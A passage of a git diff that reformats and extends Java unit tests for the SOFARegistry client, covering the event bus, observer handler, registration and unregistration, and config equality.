com.alipay.sofa.registry.client.provider.DefaultRegistryClientConfigBuilder; import org.junit.Before; import org.junit.Test; -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertFalse; -import static org.junit.Assert.assertTrue; - /** - * * @author zhuoyu.sjw * @version $Id: DefaultEventBusTest.java, v 0.1 2018-07-15 22:31 zhuoyu.sjw Exp $$ */ public class DefaultEventBusTest { - private DefaultEventBus eventBus; + private DefaultEventBus eventBus; - @Before - public void setUp() { - RegistryClientConfig config = DefaultRegistryClientConfigBuilder.start() - .setEventBusEnable(true).build(); - eventBus = new DefaultEventBus(config); - } + @Before + public void setUp() { + RegistryClientConfig config = + DefaultRegistryClientConfigBuilder.start().setEventBusEnable(true).build(); + eventBus = new DefaultEventBus(config); + } - @Test - public void isEnable0() { - RegistryClientConfig config = DefaultRegistryClientConfigBuilder.start() - .setEventBusEnable(false).build(); - eventBus = new DefaultEventBus(config); - assertFalse(eventBus.isEnable()); - } + @Test + public void isEnable0() { + RegistryClientConfig config = + DefaultRegistryClientConfigBuilder.start().setEventBusEnable(false).build(); + eventBus = new DefaultEventBus(config); + assertFalse(eventBus.isEnable()); + } - @Test - public void isEnable1() { - RegistryClientConfig config = DefaultRegistryClientConfigBuilder.start() - .setEventBusEnable(true).build(); - eventBus = new DefaultEventBus(config); - assertTrue(eventBus.isEnable()); - } + @Test + public void isEnable1() { + RegistryClientConfig config = + DefaultRegistryClientConfigBuilder.start().setEventBusEnable(true).build(); + eventBus = new DefaultEventBus(config); + assertTrue(eventBus.isEnable()); + } - @Test - public void register() { - TestEventSubscriber testEventSubscriber = new TestEventSubscriber(true); + @Test + public void register() { + TestEventSubscriber testEventSubscriber = new TestEventSubscriber(true); - try { - assertFalse(eventBus.isEnable(TestEvent.class)); - eventBus.register(TestEvent.class, testEventSubscriber); - assertTrue(eventBus.isEnable(TestEvent.class)); - } finally { - eventBus.unRegister(TestEvent.class, testEventSubscriber); - } - assertFalse(eventBus.isEnable(TestEvent.class)); + try { + assertFalse(eventBus.isEnable(TestEvent.class)); + eventBus.register(TestEvent.class, testEventSubscriber); + assertTrue(eventBus.isEnable(TestEvent.class)); + } finally { + eventBus.unRegister(TestEvent.class, testEventSubscriber); } + assertFalse(eventBus.isEnable(TestEvent.class)); + } - @Test - public void post() { - TestEventSubscriber testEventSubscriber = new TestEventSubscriber(true); + @Test + public void post() { + TestEventSubscriber testEventSubscriber = new TestEventSubscriber(true); - try { - assertFalse(eventBus.isEnable(TestEvent.class)); - eventBus.register(TestEvent.class, testEventSubscriber); - assertTrue(eventBus.isEnable(TestEvent.class)); - final String data = "test-data"; - eventBus.post(new TestEvent(data)); - assertEquals(data, testEventSubscriber.getCache()); - } finally { - eventBus.unRegister(TestEvent.class, testEventSubscriber); - } - assertFalse(eventBus.isEnable(TestEvent.class)); + try { + assertFalse(eventBus.isEnable(TestEvent.class)); + eventBus.register(TestEvent.class, testEventSubscriber); + assertTrue(eventBus.isEnable(TestEvent.class)); + final String data = "test-data"; + eventBus.post(new TestEvent(data)); + assertEquals(data, testEventSubscriber.getCache()); + } finally { + eventBus.unRegister(TestEvent.class, testEventSubscriber); } -} \ No newline at end of file + assertFalse(eventBus.isEnable(TestEvent.class)); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/event/LookoutSubscriberTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/event/LookoutSubscriberTest.java index 258125c06..7dbb2296d 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/event/LookoutSubscriberTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/event/LookoutSubscriberTest.java @@ -16,67 +16,66 @@ */ package com.alipay.sofa.registry.client.event; -import com.alipay.sofa.registry.client.api.Configurator; -import com.alipay.sofa.registry.client.api.Subscriber; -import com.alipay.sofa.registry.client.provider.DefaultRegistryClientConfigBuilder; -import org.junit.Test; - import static org.junit.Assert.assertFalse; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.times; import static org.mockito.Mockito.verify; import static org.mockito.Mockito.when; +import com.alipay.sofa.registry.client.api.Configurator; +import com.alipay.sofa.registry.client.api.Subscriber; +import com.alipay.sofa.registry.client.provider.DefaultRegistryClientConfigBuilder; +import org.junit.Test; + /** - * * @author zhuoyu.sjw * @version $Id: LookoutSubscriberTest.java, v 0.1 2018-07-15 23:04 zhuoyu.sjw Exp $$ */ public class LookoutSubscriberTest { - private LookoutSubscriber lookoutSubscriber; + private LookoutSubscriber lookoutSubscriber; - @Test - public void isSync() { - lookoutSubscriber = new LookoutSubscriber(); - assertFalse(lookoutSubscriber.isSync()); - } + @Test + public void isSync() { + lookoutSubscriber = new LookoutSubscriber(); + assertFalse(lookoutSubscriber.isSync()); + } - @Test - public void onSubscriberProcessEvent() { - lookoutSubscriber = new LookoutSubscriber(); + @Test + public void onSubscriberProcessEvent() { + lookoutSubscriber = new LookoutSubscriber(); - SubscriberProcessEvent event = new SubscriberProcessEvent(); - Subscriber subscriber = mock(Subscriber.class); - event.setSubscriber(subscriber); - event.setConfig(DefaultRegistryClientConfigBuilder.start().setInstanceId("000001").build()); - event.setStart(System.currentTimeMillis()); - event.setEnd(System.currentTimeMillis() + 1); - event.setThrowable(null); + SubscriberProcessEvent event = new SubscriberProcessEvent(); + Subscriber subscriber = mock(Subscriber.class); + event.setSubscriber(subscriber); + event.setConfig(DefaultRegistryClientConfigBuilder.start().setInstanceId("000001").build()); + event.setStart(System.currentTimeMillis()); + event.setEnd(System.currentTimeMillis() + 1); + event.setThrowable(null); - when(subscriber.getDataId()).thenReturn("test-dataId"); + when(subscriber.getDataId()).thenReturn("test-dataId"); - lookoutSubscriber.onEvent(event); + lookoutSubscriber.onEvent(event); - verify(subscriber, times(1)).getDataId(); - } + verify(subscriber, times(1)).getDataId(); + } - @Test - public void onConfiguratorProcessEvent() { - lookoutSubscriber = new LookoutSubscriber(); + @Test + public void onConfiguratorProcessEvent() { + lookoutSubscriber = new LookoutSubscriber(); - ConfiguratorProcessEvent event = new ConfiguratorProcessEvent(); - Configurator configurator = mock(Configurator.class); - event.setConfigurator(configurator); - event.setConfig(DefaultRegistryClientConfigBuilder.start().setInstanceId("000001").build()); - event.setStart(System.currentTimeMillis()); - event.setEnd(System.currentTimeMillis() + 1); - event.setThrowable(null); + ConfiguratorProcessEvent event = new ConfiguratorProcessEvent(); + Configurator configurator = mock(Configurator.class); + event.setConfigurator(configurator); + event.setConfig(DefaultRegistryClientConfigBuilder.start().setInstanceId("000001").build()); + event.setStart(System.currentTimeMillis()); + event.setEnd(System.currentTimeMillis() + 1); + event.setThrowable(null); - when(configurator.getDataId()).thenReturn("test-dataId"); + when(configurator.getDataId()).thenReturn("test-dataId"); - lookoutSubscriber.onEvent(event); + lookoutSubscriber.onEvent(event); - verify(configurator, times(1)).getDataId(); - } -} \ No newline at end of file + verify(configurator, times(1)).getDataId(); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/event/TestEvent.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/event/TestEvent.java index 7f968eef0..4ae5cf82b 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/event/TestEvent.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/event/TestEvent.java @@ -19,33 +19,32 @@ import com.alipay.sofa.registry.client.api.model.Event; /** - * * @author zhuoyu.sjw * @version $Id: TestEvent.java, v 0.1 2018-07-15 22:38 zhuoyu.sjw Exp $$ */ public class TestEvent implements Event { - private String data; + private String data; - public TestEvent(String data) { - this.data = data; - } + public TestEvent(String data) { + this.data = data; + } - /** - * Getter method for property data. - * - * @return property value of data - */ - public String getData() { - return data; - } + /** + * Getter method for property data. + * + * @return property value of data + */ + public String getData() { + return data; + } - /** - * Setter method for property data. - * - * @param data value to be assigned to property data - */ - public void setData(String data) { - this.data = data; - } + /** + * Setter method for property data. + * + * @param data value to be assigned to property data + */ + public void setData(String data) { + this.data = data; + } } diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/event/TestEventSubscriber.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/event/TestEventSubscriber.java index bd80884ca..57b86e1e6 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/event/TestEventSubscriber.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/event/TestEventSubscriber.java @@ -20,38 +20,37 @@ import com.alipay.sofa.registry.client.api.model.Event; /** - * * @author zhuoyu.sjw * @version $Id: TestEventSubscriber.java, v 0.1 2018-07-15 22:39 zhuoyu.sjw Exp $$ */ public class TestEventSubscriber implements EventSubscriber { - private boolean sync; + private boolean sync; - private String cache; + private String cache; - public TestEventSubscriber(boolean sync) { - this.sync = sync; - } + public TestEventSubscriber(boolean sync) { + this.sync = sync; + } - @Override - public boolean isSync() { - return sync; - } - - @Override - public void onEvent(Event event) { - if (event instanceof TestEvent) { - cache = ((TestEvent) event).getData(); - } - } + @Override + public boolean isSync() { + return sync; + } - /** - * Getter method for property cache. - * - * @return property value of cache - */ - public String getCache() { - return cache; + @Override + public void onEvent(Event event) { + if (event instanceof TestEvent) { + cache = ((TestEvent) event).getData(); } + } + + /** + * Getter method for property cache. + * + * @return property value of cache + */ + public String getCache() { + return cache; + } } diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/model/ConfiguratorDataTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/model/ConfiguratorDataTest.java index f96462995..17b80a825 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/model/ConfiguratorDataTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/model/ConfiguratorDataTest.java @@ -20,18 +20,15 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class ConfiguratorDataTest { - @Test - public void testAll() { - ConfiguratorData data = new ConfiguratorData(); - data.setDataBox(new DataBox()); - data.setVersion(1234L); - Assert.assertNotNull(data.getDataBox()); - Assert.assertTrue(1234L == data.getVersion()); - } - -} \ No newline at end of file + @Test + public void testAll() { + ConfiguratorData data = new ConfiguratorData(); + data.setDataBox(new DataBox()); + data.setVersion(1234L); + Assert.assertNotNull(data.getDataBox()); + Assert.assertTrue(1234L == data.getVersion()); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultObserverHandlerTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultObserverHandlerTest.java new file mode 100644 index 000000000..7b3dcc4cc --- /dev/null +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultObserverHandlerTest.java @@ -0,0 +1,66 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.client.provider; + +import static org.mockito.Mockito.times; + +import com.alipay.sofa.registry.client.api.*; +import com.alipay.sofa.registry.client.event.DefaultEventBus; +import org.junit.Test; +import org.mockito.Mockito; + +public class DefaultObserverHandlerTest { + private RegistryClientConfig config; + private EventBus eventBus; + private DefaultObserverHandler handler; + + void init() { + config = DefaultRegistryClientConfigBuilder.start().build(); + eventBus = new DefaultEventBus(config); + handler = new DefaultObserverHandler(config, eventBus); + } + + @Test + public void testSubscriber() throws Exception { + init(); + handler.notify((Subscriber) null); + Subscriber exceptionSubscriber = Mockito.mock(Subscriber.class); + Mockito.when(exceptionSubscriber.getDataObserver()).thenThrow(new RuntimeException()); + handler.notify(exceptionSubscriber); + Subscriber mockSubscriber = Mockito.mock(Subscriber.class); + Mockito.when(mockSubscriber.getDataObserver()) + .thenReturn(Mockito.mock(SubscriberDataObserver.class)); + handler.notify(mockSubscriber); + Thread.sleep(100); + Mockito.verify(mockSubscriber, times(1)).getDataObserver(); + } + + @Test + public void testConfigurator() throws Exception { + init(); + handler.notify((Configurator) null); + Configurator exceptionConfigurator = Mockito.mock(Configurator.class); + Mockito.when(exceptionConfigurator.getDataObserver()).thenThrow(new RuntimeException()); + handler.notify(exceptionConfigurator); + Configurator mockConfigurator = Mockito.mock(Configurator.class); + Mockito.when(mockConfigurator.getDataObserver()) + .thenReturn(Mockito.mock(ConfigDataObserver.class)); + handler.notify(mockConfigurator); + Thread.sleep(100); + Mockito.verify(mockConfigurator, times(1)).getDataObserver(); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfigTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfigTest.java new file mode 100644 index 000000000..744fe8299 --- /dev/null +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfigTest.java @@ -0,0 +1,51 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.client.provider; + +import org.junit.Assert; +import org.junit.Test; + +public class DefaultRegistryClientConfigTest { + @Test + public void test() { + DefaultRegistryClientConfig config1 = DefaultRegistryClientConfigBuilder.start().build(); + Assert.assertFalse(config1.equals(null)); + + Assert.assertTrue(config1.equals(config1)); + Assert.assertEquals(config1.hashCode(), config1.hashCode()); + + DefaultRegistryClientConfig config2 = DefaultRegistryClientConfigBuilder.start().build(); + + config2.setAlgorithm("test"); + Assert.assertEquals(config2.getAlgorithm(), "test"); + + config2.setEventBusEnable(false); + Assert.assertFalse(config2.isEventBusEnable()); + + config2.setAuthCacheInterval(100); + Assert.assertEquals(config2.getAuthCacheInterval(), 100); + // the setting props not impact equals + Assert.assertEquals(config1, config2); + Assert.assertEquals(config1.hashCode(), config2.hashCode()); + + DefaultRegistryClientConfig config3 = + DefaultRegistryClientConfigBuilder.start().setZone("xxx").build(); + Assert.assertNotEquals(config1, config3); + + Assert.assertTrue(config3.toString(), config3.toString().contains("xxx")); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientTest.java index 183ebb4ec..18e14f8d3 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientTest.java @@ -16,6 +16,12 @@ */ package com.alipay.sofa.registry.client.provider; +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertNotNull; +import static org.junit.Assert.assertNull; +import static org.junit.Assert.assertTrue; +import static org.mockito.Mockito.mock; + import com.alipay.sofa.registry.client.api.ConfigDataObserver; import com.alipay.sofa.registry.client.api.Configurator; import com.alipay.sofa.registry.client.api.Publisher; @@ -36,12 +42,6 @@ import org.slf4j.Logger; import org.slf4j.LoggerFactory; -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertNotNull; -import static org.junit.Assert.assertNull; -import static org.junit.Assert.assertTrue; -import static org.mockito.Mockito.mock; - /** * The type Default registry client test. * @@ -50,251 +50,243 @@ */ public class DefaultRegistryClientTest extends BaseTest { - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory.getLogger(DefaultRegistryClientTest.class); - - private String dataId = "com.alipay.sofa.registry.client.provider.DefaultRegistryClientTest"; - - private String appName = "registry-test"; - - /** - * Teardown. - */ - @After - public void teardown() { - mockServer.stop(); - } - - /** - * Register publisher. - */ - @Test - public void registerPublisher() throws InterruptedException { - PublisherRegistration registration = new PublisherRegistration(dataId); - Publisher publisher = registryClient.register(registration); - assertNotNull(publisher); - assertEquals(dataId, publisher.getDataId()); - - Thread.sleep(1000L); - - RegisterCache registerCache = registryClient.getRegisterCache(); - - Publisher publisherCache = registerCache.getPublisherByRegistId(publisher.getRegistId()); - assertNotNull(publisherCache); - assertTrue(publisher instanceof DefaultPublisher); - // set cache success - assertEquals(publisher.getRegistId(), publisherCache.getRegistId()); - DefaultPublisher defaultPublisher = (DefaultPublisher) publisher; - assertTrue(defaultPublisher.isRegistered()); - - defaultPublisher.republish("republish test"); - - Thread.sleep(500L); - // register success when republish - assertTrue(defaultPublisher.isRegistered()); - } - - /** - * Register subscriber. - */ - @Test - public void registerSubscriber() throws InterruptedException { - SubscriberDataObserver dataObserver = new SubscriberDataObserver() { - @Override - public void handleData(String dataId, UserData data) { - LOGGER.info("handle data, dataId: {}, data: {}", dataId, data); - } + /** LOGGER */ + private static final Logger LOGGER = LoggerFactory.getLogger(DefaultRegistryClientTest.class); + + private String dataId = "com.alipay.sofa.registry.client.provider.DefaultRegistryClientTest"; + + private String appName = "registry-test"; + + /** Teardown. */ + @After + public void teardown() { + mockServer.stop(); + } + + /** Register publisher. */ + @Test + public void registerPublisher() throws InterruptedException { + PublisherRegistration registration = new PublisherRegistration(dataId); + Publisher publisher = registryClient.register(registration); + assertNotNull(publisher); + assertEquals(dataId, publisher.getDataId()); + + Thread.sleep(1000L); + + RegisterCache registerCache = registryClient.getRegisterCache(); + + Publisher publisherCache = registerCache.getPublisherByRegistId(publisher.getRegistId()); + assertNotNull(publisherCache); + assertTrue(publisher instanceof DefaultPublisher); + // set cache success + assertEquals(publisher.getRegistId(), publisherCache.getRegistId()); + DefaultPublisher defaultPublisher = (DefaultPublisher) publisher; + assertTrue(defaultPublisher.isRegistered()); + + defaultPublisher.republish("republish test"); + + Thread.sleep(2000L); + // register success when republish + assertTrue(defaultPublisher.isRegistered()); + } + + /** Register subscriber. */ + @Test + public void registerSubscriber() throws InterruptedException { + SubscriberDataObserver dataObserver = + new SubscriberDataObserver() { + @Override + public void handleData(String dataId, UserData data) { + LOGGER.info("handle data, dataId: {}, data: {}", dataId, data); + } }; - SubscriberRegistration registration = new SubscriberRegistration(dataId, dataObserver); - registration.setScopeEnum(ScopeEnum.dataCenter); - Subscriber subscriber = registryClient.register(registration); - assertNotNull(subscriber); - assertEquals(dataId, subscriber.getDataId()); - - Thread.sleep(500L); - - RegisterCache registerCache = registryClient.getRegisterCache(); - - Subscriber register = registerCache.getSubscriberByRegistId(subscriber.getRegistId()); - assertNotNull(register); - // set cache success - assertEquals(subscriber.getRegistId(), register.getRegistId()); - // register success - assertTrue(register.isRegistered()); - } - - /** - * Register configurator. - */ - @Test - public void registerConfigurator() throws InterruptedException { - ConfigDataObserver dataObserver = new ConfigDataObserver() { - @Override - public void handleData(String dataId, ConfigData configData) { - LOGGER.info("handle data, dataId: {}, data: {}", dataId, configData); - - } + SubscriberRegistration registration = new SubscriberRegistration(dataId, dataObserver); + registration.setScopeEnum(ScopeEnum.dataCenter); + Subscriber subscriber = registryClient.register(registration); + assertNotNull(subscriber); + assertEquals(dataId, subscriber.getDataId()); + + Thread.sleep(2000L); + + RegisterCache registerCache = registryClient.getRegisterCache(); + + Subscriber register = registerCache.getSubscriberByRegistId(subscriber.getRegistId()); + assertNotNull(register); + // set cache success + assertEquals(subscriber.getRegistId(), register.getRegistId()); + // register success + assertTrue(register.isRegistered()); + } + + /** Register configurator. */ + @Test + public void registerConfigurator() throws InterruptedException { + ConfigDataObserver dataObserver = + new ConfigDataObserver() { + @Override + public void handleData(String dataId, ConfigData configData) { + LOGGER.info("handle data, dataId: {}, data: {}", dataId, configData); + } }; - ConfiguratorRegistration registration = new ConfiguratorRegistration(dataId, dataObserver); - - Configurator configurator = registryClient.register(registration); - assertNotNull(configurator); - assertEquals(dataId, configurator.getDataId()); + ConfiguratorRegistration registration = new ConfiguratorRegistration(dataId, dataObserver); - Thread.sleep(500L); + Configurator configurator = registryClient.register(registration); + assertNotNull(configurator); + assertEquals(dataId, configurator.getDataId()); - RegisterCache registerCache = registryClient.getRegisterCache(); + Thread.sleep(2000L); - Configurator register = registerCache.getConfiguratorByRegistId(configurator.getRegistId()); - assertNotNull(register); - // set cache success - assertEquals(configurator.getRegistId(), register.getRegistId()); - // register success - assertTrue(register.isRegistered()); - } + RegisterCache registerCache = registryClient.getRegisterCache(); - @Test - public void unregisterSinglePublisherTest() throws InterruptedException { - String dataId = "unregister-test-data-id"; + Configurator register = registerCache.getConfiguratorByRegistId(configurator.getRegistId()); + assertNotNull(register); + // set cache success + assertEquals(configurator.getRegistId(), register.getRegistId()); + // register success + assertTrue(register.isRegistered()); + } - PublisherRegistration publisherRegistration = new PublisherRegistration(dataId); - Publisher publisher = registryClient.register(publisherRegistration); + @Test + public void unregisterSinglePublisherTest() throws InterruptedException { + String dataId = "unregister-test-data-id"; - int unregisterCount = registryClient.unregister(dataId, null, RegistryType.PUBLISHER); - assertEquals(1, unregisterCount); + PublisherRegistration publisherRegistration = new PublisherRegistration(dataId); + Publisher publisher = registryClient.register(publisherRegistration); - Thread.sleep(500L); + int unregisterCount = registryClient.unregister(dataId, null, RegistryType.PUBLISHER); + assertEquals(1, unregisterCount); - Publisher temp = registryClient.getRegisterCache().getPublisherByRegistId( - publisher.getRegistId()); + Thread.sleep(2000L); - assertNull(temp); - } + Publisher temp = + registryClient.getRegisterCache().getPublisherByRegistId(publisher.getRegistId()); - @Test - public void unregisterSingleSubscriberTest() throws InterruptedException { - String dataId = "unregister-test-data-id"; + assertNull(temp); + } - SubscriberDataObserver dataObserver = mock(SubscriberDataObserver.class); - SubscriberRegistration subscriberRegistration = new SubscriberRegistration(dataId, - dataObserver); + @Test + public void unregisterSingleSubscriberTest() throws InterruptedException { + String dataId = "unregister-test-data-id"; - Subscriber subscriber = registryClient.register(subscriberRegistration); + SubscriberDataObserver dataObserver = mock(SubscriberDataObserver.class); + SubscriberRegistration subscriberRegistration = + new SubscriberRegistration(dataId, dataObserver); - int unregisterCount = registryClient.unregister(dataId, null, RegistryType.SUBSCRIBER); - assertEquals(1, unregisterCount); + Subscriber subscriber = registryClient.register(subscriberRegistration); - Thread.sleep(500L); + int unregisterCount = registryClient.unregister(dataId, null, RegistryType.SUBSCRIBER); + assertEquals(1, unregisterCount); - Subscriber temp = registryClient.getRegisterCache().getSubscriberByRegistId( - subscriber.getRegistId()); + Thread.sleep(2000L); - assertNull(temp); - } + Subscriber temp = + registryClient.getRegisterCache().getSubscriberByRegistId(subscriber.getRegistId()); - @Test - public void unregisterSingleConfiguratorTest() throws InterruptedException { - String dataId = "unregister-test-data-id"; + assertNull(temp); + } - ConfigDataObserver dataObserver = mock(ConfigDataObserver.class); + @Test + public void unregisterSingleConfiguratorTest() throws InterruptedException { + String dataId = "unregister-test-data-id"; - ConfiguratorRegistration registration = new ConfiguratorRegistration(dataId, dataObserver); + ConfigDataObserver dataObserver = mock(ConfigDataObserver.class); - Configurator configurator = registryClient.register(registration); + ConfiguratorRegistration registration = new ConfiguratorRegistration(dataId, dataObserver); - int unregisterCount = registryClient.unregister(dataId, null, RegistryType.CONFIGURATOR); - assertEquals(1, unregisterCount); + Configurator configurator = registryClient.register(registration); - Thread.sleep(500L); + int unregisterCount = registryClient.unregister(dataId, null, RegistryType.CONFIGURATOR); + assertEquals(1, unregisterCount); - Subscriber temp = registryClient.getRegisterCache().getSubscriberByRegistId( - configurator.getRegistId()); + Thread.sleep(2000L); - assertNull(temp); - } + Subscriber temp = + registryClient.getRegisterCache().getSubscriberByRegistId(configurator.getRegistId()); - @Test - public void unregisterMultiTest() throws InterruptedException { - String dataId = "unregister-test-data-id"; + assertNull(temp); + } - // 1. register - PublisherRegistration publisherRegistration1 = new PublisherRegistration(dataId); - Publisher publisher1 = registryClient.register(publisherRegistration1); + @Test + public void unregisterMultiTest() throws InterruptedException { + String dataId = "unregister-test-data-id"; - PublisherRegistration publisherRegistration2 = new PublisherRegistration(dataId); - Publisher publisher2 = registryClient.register(publisherRegistration2); + // 1. register + PublisherRegistration publisherRegistration1 = new PublisherRegistration(dataId); + Publisher publisher1 = registryClient.register(publisherRegistration1); - SubscriberDataObserver dataObserver = mock(SubscriberDataObserver.class); - SubscriberRegistration subscriberRegistration1 = new SubscriberRegistration(dataId, - dataObserver); + PublisherRegistration publisherRegistration2 = new PublisherRegistration(dataId); + Publisher publisher2 = registryClient.register(publisherRegistration2); - Subscriber subscriber1 = registryClient.register(subscriberRegistration1); + SubscriberDataObserver dataObserver = mock(SubscriberDataObserver.class); + SubscriberRegistration subscriberRegistration1 = + new SubscriberRegistration(dataId, dataObserver); - SubscriberRegistration subscriberRegistration2 = new SubscriberRegistration(dataId, - dataObserver); + Subscriber subscriber1 = registryClient.register(subscriberRegistration1); - Subscriber subscriber2 = registryClient.register(subscriberRegistration2); + SubscriberRegistration subscriberRegistration2 = + new SubscriberRegistration(dataId, dataObserver); - Thread.sleep(500L); + Subscriber subscriber2 = registryClient.register(subscriberRegistration2); - // 2. unregister publisher - int unregisterCount = registryClient.unregister(dataId, null, RegistryType.PUBLISHER); - assertEquals(2, unregisterCount); + Thread.sleep(2000L); - Thread.sleep(500L); + // 2. unregister publisher + int unregisterCount = registryClient.unregister(dataId, null, RegistryType.PUBLISHER); + assertEquals(2, unregisterCount); - // 3. check publisher register cache - RegisterCache registerCache = registryClient.getRegisterCache(); - Publisher tempPub = registerCache.getPublisherByRegistId(publisher1.getRegistId()); - assertNull(tempPub); + Thread.sleep(2000L); - tempPub = registerCache.getPublisherByRegistId(publisher2.getRegistId()); - assertNull(tempPub); + // 3. check publisher register cache + RegisterCache registerCache = registryClient.getRegisterCache(); + Publisher tempPub = registerCache.getPublisherByRegistId(publisher1.getRegistId()); + assertNull(tempPub); - // 4. unregister subscriber - unregisterCount = registryClient.unregister(dataId, null, RegistryType.SUBSCRIBER); - assertEquals(2, unregisterCount); + tempPub = registerCache.getPublisherByRegistId(publisher2.getRegistId()); + assertNull(tempPub); - Thread.sleep(500L); + // 4. unregister subscriber + unregisterCount = registryClient.unregister(dataId, null, RegistryType.SUBSCRIBER); + assertEquals(2, unregisterCount); - // 5. check subscriber register cache - Subscriber tempSub = registerCache.getSubscriberByRegistId(subscriber1.getRegistId()); - assertNull(tempSub); + Thread.sleep(2000L); - tempSub = registerCache.getSubscriberByRegistId(subscriber2.getRegistId()); - assertNull(tempSub); - } + // 5. check subscriber register cache + Subscriber tempSub = registerCache.getSubscriberByRegistId(subscriber1.getRegistId()); + assertNull(tempSub); - @Test - public void testSetAppNameByRegistration() { - PublisherRegistration publisherRegistration = new PublisherRegistration(dataId); - final String testApp = "test-app"; - publisherRegistration.setAppName(testApp); + tempSub = registerCache.getSubscriberByRegistId(subscriber2.getRegistId()); + assertNull(tempSub); + } - Publisher publisher = registryClient.register(publisherRegistration); - PublisherRegister register = ((DefaultPublisher) publisher).assembly(); + @Test + public void testSetAppNameByRegistration() { + PublisherRegistration publisherRegistration = new PublisherRegistration(dataId); + final String testApp = "test-app"; + publisherRegistration.setAppName(testApp); - assertEquals(testApp, register.getAppName()); + Publisher publisher = registryClient.register(publisherRegistration); + PublisherRegister register = ((DefaultPublisher) publisher).assembly(); - SubscriberRegistration subscriberRegistration = new SubscriberRegistration(dataId, - mock(SubscriberDataObserver.class)); - subscriberRegistration.setAppName(testApp); + assertEquals(testApp, register.getAppName()); - Subscriber subscriber = registryClient.register(subscriberRegistration); - SubscriberRegister subscriberRegister = ((DefaultSubscriber) subscriber).assembly(); + SubscriberRegistration subscriberRegistration = + new SubscriberRegistration(dataId, mock(SubscriberDataObserver.class)); + subscriberRegistration.setAppName(testApp); - assertEquals(testApp, subscriberRegister.getAppName()); - } + Subscriber subscriber = registryClient.register(subscriberRegistration); + SubscriberRegister subscriberRegister = ((DefaultSubscriber) subscriber).assembly(); - @Test - public void testSetAppNameByConfig() { - PublisherRegistration publisherRegistration = new PublisherRegistration(dataId); + assertEquals(testApp, subscriberRegister.getAppName()); + } - Publisher publisher = registryClient.register(publisherRegistration); - PublisherRegister register = ((DefaultPublisher) publisher).assembly(); + @Test + public void testSetAppNameByConfig() { + PublisherRegistration publisherRegistration = new PublisherRegistration(dataId); - assertEquals(appName, register.getAppName()); + Publisher publisher = registryClient.register(publisherRegistration); + PublisherRegister register = ((DefaultPublisher) publisher).assembly(); - } -} \ No newline at end of file + assertEquals(appName, register.getAppName()); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultServerManagerTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultServerManagerTest.java index 298711b27..1e3e0aff1 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultServerManagerTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultServerManagerTest.java @@ -16,28 +16,26 @@ */ package com.alipay.sofa.registry.client.provider; +import static org.junit.Assert.assertNotNull; +import static org.mockito.Matchers.any; +import static org.mockito.Matchers.anyMapOf; +import static org.mockito.Matchers.anyString; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.times; +import static org.mockito.Mockito.when; + import com.alipay.sofa.registry.client.api.RegistryClientConfig; import com.alipay.sofa.registry.client.remoting.ServerManager; import com.alipay.sofa.registry.client.remoting.ServerNode; import com.alipay.sofa.registry.client.util.HttpClientUtils; +import java.util.List; import org.junit.Test; import org.junit.runner.RunWith; import 